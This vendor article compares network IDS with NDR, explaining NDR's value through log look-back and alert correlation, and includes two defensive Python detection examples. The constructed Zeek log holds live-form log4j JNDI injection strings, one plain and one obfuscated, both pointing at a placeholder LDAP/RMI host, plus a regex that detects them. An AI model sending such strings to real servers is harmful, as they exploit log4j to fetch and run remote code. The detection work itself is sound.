NDR vs. IDS: Which is best for threat detection?
Discover why SecOps teams are turning to NDR to detect and disrupt sophisticated emerging threats.
The role that IDS has played in security
Network intrusion detection systems and network intrusion prevention systems (NIDS/NIPS) have been foundational components of cybersecurity since the mid-1990s. Network IDS are deployed primarily at the ingress/egress points of internet traffic and sometimes at key switching locations on the network to monitor internal lateral-movement traffic.
An IDS typically relies on signature-based detections to identify threats and adversarial activity on the network. Over time, IDS platforms added prevention capability and became intrusion prevention systems, or IPS. The IPS functionality blocks network traffic in addition to monitoring it, so whenever a detection alert is triggered, the offending network traffic is halted. Prevention capabilities were a response to analysts and incident responders becoming overwhelmed by increases in both the number of attacks and their level of sophistication. However, because properly tuning IPS signatures requires a high level of expertise, SecOps teams quickly drew the ire of the NetOps side of the house: false positives and benign true positives triggered inline blocking of legitimate traffic and caused frequent inadvertent network outages.
IDS platforms generally now include anomalous behavior detection capabilities and even machine learning (ML) to look for irregular traffic patterns and known indicators and precursors of an attack profile. IDS solutions can also include specific malware detection techniques, including virtual sandboxing to run and test executable software in isolation before it is passed on. Because of all these different types of detections and capabilities, both IDS and IPS solutions are now an important part of compliance with standards and regulations, such as Payment Card Industry Data Security Standard (PCI DSS), which may explicitly require the use of IDS or IPS to ensure protection of sensitive third-party information.
The challenge of leveraging IDS capabilities in isolation
It is very important to understand what happens when an IDS detection triggers and how it impacts an organization. When a detection is triggered, the IDS generates event logs and alerts for a SIEM to aggregate, correlate, and forward to SecOps teams. Correlation with events and alerts from other security solutions, such as EDR, is critical because it transforms raw alerts and events into a context-rich story that accelerates a SOC’s ability to investigate, detect, and respond to threats. But before correlation can happen, the IDS events and alerts must first be normalized by the SIEM. Without correlation, these alerts and events include only a subset of the related threat details, requiring more senior-level analysts and incident responders to spend additional time searching for the other pieces of the story and then trying to weave them all together.
Even if a security team has correlated its IDS alerts with rich context, the IDS is signature-based, which means the team can only see an alert when a known vulnerability or attack pattern has been detected. This also means that an IDS cannot produce evidence of a zero-day attack: zero-days happen in real time and are not covered by an industry-wide detection or signature until it’s too late. For example, when SUNBURST and log4j were first discovered in 2020 and 2021 respectively, they were considered zero-day attacks because they were not previously known to the industry, making it impossible for a traditional IDS to detect them.
Without a known detection or signature for the IDS to draw on, no alert is triggered. It wasn’t until an industry-wide detection was issued for SUNBURST and log4j that companies could even use their IDS to determine whether an attacker had exploited these vulnerabilities to compromise their systems. This is because an IDS only applies known signatures; it does not provide security teams with general network monitoring data. Without that data, security teams lack the historical telemetry they need to conduct in-depth investigations, leaving their organization vulnerable because they have no way to see whether someone is exploiting an actively exploited, still-unaddressed vulnerability like SUNBURST or log4j to enter the network. (For more on the advantages of tools that facilitate retro-matching to see if you’ve been compromised through an unaddressed vulnerability, keep reading; we discuss tools like NDR below.)
Speaking of alerts, not all alerts and events are true positives; without significant tuning of the IDS platform, specifically its detection rules, most alerts turn out to be false positives. And even when they are true positives, they are not always tagged with the appropriate severity, because the IDS bases the severity on its own detection rule. When correlated with alerts and logs from other security solutions, however, the accuracy of the severity assessment can improve dramatically. Without correlation, symptoms of alert fatigue appear very quickly (e.g., lengthy incident handling and remediation times).
As many security professionals have pointed out, the playbook that adversaries use is designed to evade traditional IDS/IPS detections and capabilities. In its basic form, their playbook simply requires human error to gain access to a trusted, privileged account, then uses that compromised account to blend in with everyday network traffic. This is possible because adversaries already know exactly what will trigger an IDS alert: they can research the detections and rules well ahead of time. IDS rules are typically written reactively, based on research into attacks that have already happened, and vendors have to write them in a one-size-fits-all style because each rule must apply to the most common network configurations. While IDS/IPS capabilities are still essential, many organizations are shifting to more sophisticated, customizable, and comprehensive solutions.
There are practical concerns beyond the technology’s technical limitations. Many IDS systems are nearing end-of-life and are no longer adequately supported by their vendors. The upgrade paths that IDS/IPS vendors offer to customers affected by EOL models are just hardware improvements and extended warranties; they do not offer any cutting-edge detection capabilities.
What is NDR?
Network Detection and Response (NDR) is a security technology that, like network IDS, monitors network traffic, but it can scan a much more complex environment, including but not limited to cloud, hybrid, and multi-cloud environments, network firewalls, SaaS, traffic generated by remote users, network taps, and servers. It enables security teams to monitor lateral movement, making it much more likely to detect activity by malicious actors who have bypassed traditional perimeter defenses by compromising remote user accounts or devices.
For many enterprises, migrating to an NDR platform has allowed them to retain the core IDS monitoring and detection functionality with continued compliance and reporting capabilities, while significantly improving their alerting and threat detection and response capabilities. The paragraphs below explain how an upgrade to NDR can be a “both/and” proposition that preserves necessary IDS functions while significantly improving overall security.
An NDR platform aggregates data from disparate sources and provides structure and context for analysts, which in turn helps them become more efficient at validating and triaging alerts and tuning the alerting system. It provides wider and deeper coverage of enterprise environments, streamlines response, and makes network-based attack techniques, such as command and control (C2) or data exfiltration, easier for security teams to spot in early attack phases.
NDR also provides SOCs with the historical telemetry and context to see whether an adversary has entered their network and, if so, how. This type of historical look-back is something that signature-based tools lack. NDR provides network data that extends the threat intelligence timeline backward and gives threat analysts the ability to scan for known indicators and evidence of vulnerability exploitation that pre-date the discovery of a zero-day. But not all NDR is the same. Even NDR can have limitations, often looking back only a few days, which constrains an analyst’s investigation timeline. NDR technologies that incorporate network security monitoring platforms such as Zeek®, however, extend the investigation timeline significantly, going back months and even years. By using network security monitoring, analysts can uncover evidence of adversary activity and disrupt potential attacks before they happen.
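To make the retro-matching idea from the IDS discussion and the look-back window described here concrete, the following is an added example written for this article; it is not Corelight's code and not drawn from any product. It searches a retained Zeek-style http.log for log4j JNDI lookup strings (including the common `${lower:x}` obfuscation) and for a list of published indicators, once with a three-day look-back and once with a year-long one, so that the difference in what a short retention window can surface is visible. The log excerpt, uids, hosts, timestamps and the `ioc-placeholder.example` indicator are all constructed, and the column subset is a hypothetical cut of Zeek's http.log fields.

```python
import re
from datetime import datetime, timedelta, timezone

# Fixed "now" so the look-back comparison is reproducible (constructed).
NOW = datetime(2024, 3, 10, tzinfo=timezone.utc)


def _row(*cols):
    return "\t".join(str(c) for c in cols)


# Constructed Zeek-style http.log excerpt: Zeek's header lines, then one record per line.
# Hosts, uids, timestamps and the indicator domain are placeholders; the columns are a
# hypothetical subset of Zeek's http.log fields. Rows are oldest first, as in a real log.
HTTP_LOG = "\n".join([
    "#separator \\x09",
    _row("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
         "method", "host", "uri", "user_agent", "status_code"),
    # ~200 days before NOW: obfuscated JNDI lookup in the URI
    _row((NOW - timedelta(days=200)).timestamp(), "Cq1x2y3z4a5b6c7d8", "198.51.100.9", 44321,
         "10.0.0.5", 8080, "GET", "app.internal.example",
         "/api?x=${${lower:j}ndi:rmi://203.0.113.10:1099/o}", "curl/7.88.1", 400),
    # ~90 days before NOW: request to a host that later appears on an indicator list
    _row((NOW - timedelta(days=90)).timestamp(), "Cw9v8u7t6s5r4q3p2", "10.0.0.23", 51002,
         "203.0.113.77", 80, "GET", "ioc-placeholder.example", "/update.bin", "Mozilla/5.0", 200),
    # 2 days before NOW: ordinary traffic
    _row((NOW - timedelta(days=2)).timestamp(), "Ce4f3g2h1i0j9k8l7", "10.0.0.41", 52110,
         "10.0.0.5", 8080, "GET", "app.internal.example", "/login", "Mozilla/5.0", 200),
    # 2 days before NOW (100 s later): plain JNDI lookup in the User-Agent header
    _row((NOW - timedelta(days=2, seconds=-100)).timestamp(), "Cm6n5o4p3q2r1s0t9", "198.51.100.9",
         44390, "10.0.0.5", 8080, "GET", "app.internal.example", "/",
         "${jndi:ldap://203.0.113.10:1389/a}", 200),
])

# Indicators an advisory would publish (constructed placeholder).
INDICATORS = ["ioc-placeholder.example"]

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)
# Logged values may carry ${lower:x}/${upper:x} obfuscation; collapse it before matching.
OBFUSCATION_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I)


def normalize(value):
    """Repeatedly strip ${lower:x}/${upper:x} wrappers until the string stops changing."""
    prev = None
    while prev != value:
        prev, value = value, OBFUSCATION_RE.sub(r"\1", value)
    return value


def parse_zeek_tsv(text):
    """Yield one dict per record from Zeek's tab-separated log format."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            yield dict(zip(fields, line.split("\t")))


def retro_match(log_text, indicators, lookback_days, now=NOW):
    """Return hits for JNDI lookups and indicator matches within the look-back window."""
    cutoff = now - timedelta(days=lookback_days)
    hits = []
    for rec in parse_zeek_tsv(log_text):
        ts = datetime.fromtimestamp(float(rec["ts"]), tz=timezone.utc)
        if ts < cutoff:
            continue  # older than the retained/searched window
        for field in ("host", "uri", "user_agent"):
            value = normalize(rec.get(field, "-"))
            if JNDI_RE.search(value):
                hits.append({"ts": ts.isoformat(), "uid": rec["uid"], "field": field,
                             "indicator": "jndi-lookup"})
            for ioc in indicators:
                if ioc.lower() in value.lower():
                    hits.append({"ts": ts.isoformat(), "uid": rec["uid"], "field": field,
                                 "indicator": ioc})
    return hits


if __name__ == "__main__":
    for days in (3, 365):
        hits = retro_match(HTTP_LOG, INDICATORS, days)
        print(f"look-back {days:>3} days: {len(hits)} hit(s)")
        for hit in hits:
            print("   ", hit)
```

With a three-day window only the recent User-Agent hit surfaces; with a year of retained Zeek logs the older obfuscated URI attempt and the later indicator match appear as well, which is the difference the look-back discussion above is about.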
Can NDR replace IDS?
Organizations looking to replace an aging IDS/IPS solution will need assurance that none of its critical functionality will be lost when migrating to another solution. A best-in-class NDR platform, with strong support from its vendor, should result in a seamless migration that delivers equal or improved IDS functionality.
Best-in-class NDR solutions will pre-correlate core IDS monitoring and detection capabilities with unbiased network metadata and just-in-time trigger-based packet capture technology to generate contextually rich network evidence that accelerates incident investigation and response times and improves effectiveness across all SecOps teams.
When NDR is deployed in conjunction with other security solutions, such as endpoint detection and response (EDR), security information and event management (SIEM), and, in some cases, extended detection and response (XDR), security analysts can achieve a comprehensive detection and response capability that can deepen over time and provide a strong combination of automation, analytics, and signature collections for a more holistic approach to security.
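As an added illustration of the correlation described in the alert-severity discussion and in the two paragraphs above (example code written for this article, not Corelight's product logic or any vendor's API), the following joins a Suricata-style IDS alert to the matching Zeek conn.log record by 5-tuple and time, attaches EDR process events from the same source host, and re-scores the IDS severity from that context. The alerts, connections, endpoint events, signature ids and thresholds are all constructed; where the IDS and the network sensor both export a shared community ID or the Zeek uid, a production join would key on that instead of the 5-tuple.

```python
import json
from datetime import datetime, timedelta, timezone


def _epoch(iso):
    """Zeek writes epoch seconds; build them from ISO strings here for readability."""
    return datetime.fromisoformat(iso).timestamp()


# Constructed Suricata EVE-style alerts (signature ids/names are hypothetical; severity 1 = high, 3 = low).
IDS_ALERTS = [json.loads(line) for line in """
{"timestamp":"2024-03-10T14:02:11.000000+0000","event_type":"alert","src_ip":"10.1.2.3","src_port":51234,"dest_ip":"203.0.113.50","dest_port":443,"proto":"TCP","alert":{"signature_id":9000001,"signature":"HYPOTHETICAL possible C2 beacon","severity":2}}
{"timestamp":"2024-03-10T14:05:40.000000+0000","event_type":"alert","src_ip":"10.1.2.7","src_port":40022,"dest_ip":"203.0.113.80","dest_port":8080,"proto":"TCP","alert":{"signature_id":9000002,"signature":"HYPOTHETICAL web app exploit attempt","severity":1}}
""".strip().splitlines()]

# Constructed Zeek conn.log records for the same two flows (uids are placeholders).
ZEEK_CONN = [
    {"ts": _epoch("2024-03-10T14:02:10.500+00:00"), "uid": "CHhAvVGS1DHFjwGM9",
     "id.orig_h": "10.1.2.3", "id.orig_p": 51234, "id.resp_h": "203.0.113.50", "id.resp_p": 443,
     "proto": "tcp", "duration": 3598.4, "orig_bytes": 48212, "resp_bytes": 1203, "conn_state": "SF"},
    {"ts": _epoch("2024-03-10T14:05:40.100+00:00"), "uid": "Cm3Q4T2w6Xk9pLd1a",
     "id.orig_h": "10.1.2.7", "id.orig_p": 40022, "id.resp_h": "203.0.113.80", "id.resp_p": 8080,
     "proto": "tcp", "duration": 0.0, "orig_bytes": 0, "resp_bytes": 0, "conn_state": "REJ"},
]

# Constructed EDR process events (hostnames and timing are placeholders).
EDR_EVENTS = [
    {"ts": "2024-03-10T14:01:58+00:00", "host_ip": "10.1.2.3", "hostname": "ws-0042",
     "process": "powershell.exe", "parent": "winword.exe"},
    {"ts": "2024-03-10T09:30:00+00:00", "host_ip": "10.1.2.7", "hostname": "ws-0051",
     "process": "chrome.exe", "parent": "explorer.exe"},
]

# Zeek conn_state values meaning the TCP handshake never completed.
NOT_ESTABLISHED = {"S0", "REJ", "RSTOS0", "RSTRH"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def parse_suricata_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def find_conn(alert, conns, tolerance=timedelta(seconds=5)):
    """Match the alert's 5-tuple to a Zeek connection whose lifetime covers the alert time."""
    at = parse_suricata_ts(alert["timestamp"])
    key = (alert["src_ip"], alert["src_port"], alert["dest_ip"], alert["dest_port"], alert["proto"].lower())
    for c in conns:
        if (c["id.orig_h"], c["id.orig_p"], c["id.resp_h"], c["id.resp_p"], c["proto"]) != key:
            continue
        start = datetime.fromtimestamp(c["ts"], tz=timezone.utc)
        if start - tolerance <= at <= start + timedelta(seconds=c["duration"]) + tolerance:
            return c
    return None


def endpoint_context(alert, events, window=timedelta(minutes=5)):
    """EDR events from the alert's source host within +/- window of the alert."""
    at = parse_suricata_ts(alert["timestamp"])
    return [e for e in events
            if e["host_ip"] == alert["src_ip"] and abs(datetime.fromisoformat(e["ts"]) - at) <= window]


def rescore(alert, conn, edr_events):
    """Adjust the IDS rule's own severity using network and endpoint context; return (severity, reasons)."""
    severity = alert["alert"]["severity"]
    reasons = []
    if conn is None:
        reasons.append("no Zeek connection matched the alert's 5-tuple; keeping IDS severity")
    elif conn["conn_state"] in NOT_ESTABLISHED:
        severity = min(severity + 1, 3)  # attempt never completed: lower priority
        reasons.append(f"Zeek {conn['uid']} is {conn['conn_state']}: the connection was never established")
    else:
        reasons.append(f"Zeek {conn['uid']} completed ({conn['conn_state']}): {conn['orig_bytes']} bytes out, "
                       f"{conn['resp_bytes']} bytes in over {conn['duration']:.0f}s")
    for e in edr_events:
        if e["parent"].lower() in OFFICE_APPS and e["process"].lower() in SCRIPT_HOSTS:
            severity = 1  # script host spawned by an Office app on the same host: raise to high
            reasons.append(f"EDR on {e['hostname']}: {e['process']} spawned by {e['parent']} at {e['ts']}")
    return severity, reasons


def build_story(alert, conns=ZEEK_CONN, events=EDR_EVENTS):
    """Produce the context-rich record an analyst would triage instead of the bare IDS alert."""
    conn = find_conn(alert, conns)
    edr = endpoint_context(alert, events)
    severity, reasons = rescore(alert, conn, edr)
    return {"signature": alert["alert"]["signature"], "ids_severity": alert["alert"]["severity"],
            "severity": severity, "conn_uid": conn["uid"] if conn else None,
            "endpoint_events": edr, "reasons": reasons}


if __name__ == "__main__":
    for alert in IDS_ALERTS:
        print(json.dumps(build_story(alert), indent=2))
```

The first alert starts at medium severity but is raised to high because the flow completed, carried tens of kilobytes outbound, and the endpoint shows a script host launched from an Office application minutes earlier; the second starts at high but is lowered because Zeek shows the connection was rejected before any payload was delivered.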
Choosing the right NDR solution
When looking to evolve your IDS capabilities, consider these decisive factors for selecting an NDR solution:
- Best-in-Class Network Visibility: Seek out vendors that provide transparent and detailed insights into the data sources and visibility provided. Avoid platforms that feel like a "black box" or utilize unexplained ML. If a vendor can't clarify data origins, your security team will face the same ambiguity during investigation. It's essential for your team to visualize the entire network activity narrative, not just threat-indicator alerts.
- Seamless Interoperability and Integration: Consolidating security tools can be challenging, especially when working with various vendor products. An ideal NDR solution should not only provide expansive visibility but also seamlessly integrate with existing security infrastructure like EDR and SIEM. This integration is paramount for an efficient SOC Visibility Triad. It's crucial to ascertain the vendor's stance on integration and their flexibility early on. Some might push their proprietary platforms, which could be counterproductive if you're content with your current systems.
- Robust Evidence to Complement IDS Alerts: While NDRs provide a more extensive network data collection than traditional IDS, it's the quality and context of the data that matter most. Prioritize solutions with effective entity discovery and data collection tools, backed by features that enable security teams to optimize logging and avoid data overload. A prime NDR solution will correlate IDS alerts with enriched network logs and intelligent packet captures, enabling teams to act swiftly on genuine threats.
Corelight's commitment to excellence with open source
Corelight is the leader in Open NDR, an approach to NDR that leverages open source technologies including Zeek and Suricata for delivering world-class network visibility accompanied by precise alerts, comprehensive network metadata, and space-efficient PCAPs. The global cyber community widely adopts these tools, setting an industry standard that's not just applied in practice but is also taught at revered institutions like SANS.
By harnessing community-driven and native analytics, Corelight delivers cutting-edge intelligence and threat hunting capabilities across every facet of your organization’s kill chain. Celebrated by Forrester in its Network Analysis and Visibility 2023 report for our structured data and seamless SIEM integrations, Corelight ensures that security teams can expedite investigations, markedly reducing the time to detect and counteract threats. Learn about Corelight Open NDR.
Book a demo
We’re proud to protect some of the most sensitive, mission-critical enterprises and government agencies in the world. Learn how Corelight’s Open NDR Platform can help your organization tackle cybersecurity risk.